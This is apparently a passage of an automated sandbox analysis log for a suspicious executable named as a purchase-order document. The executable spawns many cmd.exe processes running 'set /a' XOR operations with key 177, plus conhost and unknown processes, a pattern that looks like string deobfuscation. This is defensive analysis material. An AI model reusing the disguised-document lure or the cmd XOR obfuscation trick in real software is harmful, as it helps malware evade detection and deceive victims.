              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
